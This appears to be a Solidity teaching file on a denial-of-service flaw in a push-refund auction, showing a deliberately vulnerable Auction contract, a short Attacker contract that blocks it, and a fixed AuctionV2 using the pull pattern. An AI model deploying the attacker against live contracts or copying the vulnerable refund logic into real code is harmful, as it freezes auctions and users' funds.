Perform DoS attack. The Auction contract is vulnerable to a DoS attack, and AuctionV2 solves this by using the pull-over-push pattern.
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
contract Auction {
    // Address of the current highest bidder; refunded when outbid.
    address payable public currentLeader;
    // Amount (wei) of the current highest bid.
    uint public highestBid;

    /// @notice Places a bid that must exceed `highestBid`; the previous leader
    ///         is refunded immediately ("push" pattern).
    /// @dev Deliberately vulnerable demonstration. `send` returns false instead
    ///      of reverting when the transfer fails, and the `require(success)`
    ///      below then reverts the whole call before `currentLeader` or
    ///      `highestBid` is updated. A leader that cannot accept plain ether
    ///      (a contract with no `receive`/`fallback`, see `Attacker`) therefore
    ///      makes the same refund fail for every later bidder, blocking the
    ///      auction. `AuctionV2` avoids this by crediting refunds for later
    ///      withdrawal instead of pushing them here.
    function bid() public payable {
        require(msg.value > highestBid);
        // Interaction (refund) happens before the state update — the root
        // of the denial-of-service issue described above.
        bool success = currentLeader.send(highestBid);
        require(success);
        currentLeader = payable(msg.sender);
        highestBid = msg.value;
    }
}
contract Attacker {
    // The `Auction` instance this contract bids on; fixed at deployment.
    Auction public immutable externalContract;

    /// @param externalContractAddress Address of a deployed `Auction`.
    constructor(address externalContractAddress) {
        externalContract = Auction(externalContractAddress);
    }

    /// @notice Forwards the attached ether as a bid so that this contract
    ///         becomes `currentLeader` of the `Auction`.
    /// @dev Illustrates the failure mode documented on `Auction.bid`: this
    ///      contract defines no `receive`/`fallback` (the line is commented out
    ///      below), so plain ether transfers to it fail and the auction's refund
    ///      `send` returns false for every later bidder. Uncommenting
    ///      `receive()` lets the refund succeed and the blocking disappears.
    function attack() public payable {
        externalContract.bid { value: msg.value }();
    }
    // receive() external payable {}
}
contract AuctionV2 {
    // Current highest bidder; cannot withdraw while still leading.
    address payable public currentLeader;
    // Current highest bid in wei.
    uint public highestBid;
    // Refunds owed to outbid bidders, claimed through `withdraw` (pull pattern).
    mapping(address => uint) public balances;

    /// @notice Places a bid that must exceed `highestBid`. The outbid leader's
    ///         stake is credited to `balances` rather than sent back.
    /// @dev No external call is made here, so a leader that rejects ether
    ///      cannot block later bids (contrast with `Auction.bid`). Note that
    ///      the comparison `require` carries no reason string, unlike the
    ///      ones in `withdraw`.
    function bid() public payable {
        uint previousBid = highestBid;
        address payable previousLeader = currentLeader;
        require(msg.value > previousBid);
        // Instead of sending ether to address (pushing) we do pulling
        balances[previousLeader] += previousBid;
        highestBid = msg.value;
        currentLeader = payable(msg.sender);
    }

    /// @notice Sends the caller everything credited to them in `balances`.
    /// @dev Checks-effects-interactions: the balance is cleared before the
    ///      external call, so a re-entering caller finds nothing left to
    ///      claim. The leader check also locks any earlier refunds of the
    ///      current leader until they are outbid again.
    function withdraw() public {
        require(msg.sender != currentLeader, "Current king cannot withdraw");
        uint owed = balances[msg.sender];
        delete balances[msg.sender];
        (bool ok, ) = msg.sender.call{value: owed}("");
        require(ok, "Failed to send Ether");
    }
}